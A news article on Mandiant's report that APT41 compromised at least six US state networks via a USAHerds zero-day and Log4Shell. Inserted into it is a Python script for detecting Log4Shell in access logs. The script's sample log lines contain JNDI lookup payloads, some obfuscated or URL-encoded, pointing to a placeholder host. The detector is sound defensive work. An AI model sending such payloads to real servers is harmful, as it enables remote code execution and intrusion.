
China-backed APT41 compromised 'at least' six US state governments

Carly Page

The prolific China-backed APT41 hacking group, known for carrying out espionage in parallel with financially motivated operations, has compromised multiple U.S. state government networks, according to cybersecurity giant Mandiant.

The group — seemingly undeterred by U.S. indictments against five APT41 members in 2020 — conducted a months-long campaign during which it targeted and successfully breached at least six U.S. state networks, all of which have been notified by Mandiant but were not named.

Between May 2021 and February 2022, the hacking group used vulnerable internet-facing web applications to gain an initial foothold in state networks. This included exploiting a zero-day vulnerability in a software application called USAHerds, used by 18 states for animal health management, and the now-infamous Log4Shell vulnerability in Apache Log4j, a ubiquitous Java logging library.

Mandiant said APT41 began exploiting Log4Shell within hours of the Apache Foundation publicly sounding the alarm about the vulnerability in December 2021, which led to the compromise of two U.S. state government networks and other targets in the insurance and telecoms industries. After gaining that foothold on the network, APT41 went on to perform "extensive" credential collection.
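The Log4Shell activity described above is the kind of initial access that shows up first in web-server access logs, because the malicious lookup string has to arrive in a request field that the application logs. The following is an added example, not code from Mandiant or from the article, of a defender-side scan over constructed access-log lines: it URL-decodes each line, collapses the nested-lookup obfuscation that was widely seen in the wild (`${lower:...}`, `${upper:...}` and `${...:-default}`) so that a disguised `${jndi:` is visible, and then flags the line. The sample lines, the `example.invalid` hostnames and the function names are all constructed for the example.

```python
"""Flag web access-log lines carrying a Log4Shell-style JNDI lookup.

Added example (not Mandiant's or the article's code). The log lines are
constructed; hostnames use the reserved 'example.invalid' domain.
"""
import re
from urllib.parse import unquote

# Inner lookups used to disguise the string '${jndi:':
#   ${lower:J} -> 'j', ${upper:j} -> 'J', ${::-j} or ${env:NOPE:-j} -> 'j'
_NESTED = re.compile(
    r"\$\{(?P<fn>lower|upper):(?P<arg>[^}$]*)\}"      # ${lower:X} / ${upper:X}
    r"|\$\{[^{}$]*:-(?P<dflt>[^}$]*)\}"               # ${anything:-default}
)

# What we are actually looking for once obfuscation is removed.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(m: re.Match) -> str:
    """Replace one innermost lookup with the text it would evaluate to."""
    if m.group("fn") is not None:
        return m.group("arg").lower() if m.group("fn") == "lower" else m.group("arg").upper()
    return m.group("dflt")


def normalize_lookups(s: str, max_rounds: int = 10) -> str:
    """Collapse nested lookups innermost-first, e.g. '${${lower:j}ndi:x}' -> '${jndi:x}'.

    The round limit keeps a pathological input from looping forever."""
    for _ in range(max_rounds):
        new = _NESTED.sub(_resolve, s)
        if new == s:
            break
        s = new
    return s


def is_log4shell_probe(line: str) -> bool:
    """True if the line, after URL-decoding and de-obfuscation, contains '${jndi:'."""
    return _JNDI.search(normalize_lookups(unquote(line))) is not None


def scan(lines):
    """Return the subset of log lines that should be escalated for review."""
    return [ln for ln in lines if is_log4shell_probe(ln)]


# Constructed sample access-log lines (combined log format). Line 0 and line 4
# are benign; lines 1-3 carry the lookup string in a header, a query string
# and a URL-encoded header respectively.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:01:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:02:20 +0000] "GET /?x=${${lower:j}ndi:rmi://example.invalid/b} HTTP/1.1" 404 0 "-" "curl/7.1"',
    '10.0.0.9 - - [10/Dec/2021:10:02:31 +0000] "GET / HTTP/1.1" 200 512 "-" "%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2Fexample.invalid%2Fc%7D"',
    '10.0.0.7 - - [10/Dec/2021:10:03:02 +0000] "GET /?q=${price} HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("escalate:", hit)
```

The scan is deliberately narrow: it answers "did a JNDI lookup string reach this server", which is the question an incident responder asks first when triaging the window after the Apache disclosure. It does not tell you whether the lookup was evaluated; that requires correlating the request timestamp with outbound LDAP/RMI connections from the application host, and a patched Log4j will log the same lines without being exploited.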

The investigation also uncovered a variety of new techniques, evasion methods, and capabilities used by APT41. In one instance, after APT41 gained access to a network via a SQL injection vulnerability in a proprietary web application — activity that was contained by Mandiant — APT41 came back two weeks later to recompromise the network with a brand new zero-day exploit. The group also tailored its malware to its victims' environments and frequently updated the encoded data on a specific forum post, enabling the malware to receive instructions from the attackers' command and control server.

Though Mandiant said it saw evidence of the hackers exfiltrating personally identifiable information, which is typically consistent with an espionage operation, it said the goal of the campaign remains unclear, but that whatever the group is after, it must be of high value.

Geoff Ackerman, principal threat analyst at Mandiant, said that while the world is focused on the potential of Russian cyber threats in the wake of the invasion of Ukraine, this investigation is a reminder that other major threat actors around the world are continuing their operations as usual.

“We cannot allow other cyber activity to fall to the wayside, especially given our observations that this campaign from APT41, one of the most prolific threat actors around, continues to this day,” said Ackerman. “APT41 is truly a persistent threat, and this recent campaign is another reminder that state-level systems in the United States are under unrelenting pressure from nation-state actors like China, as well as Russia.”
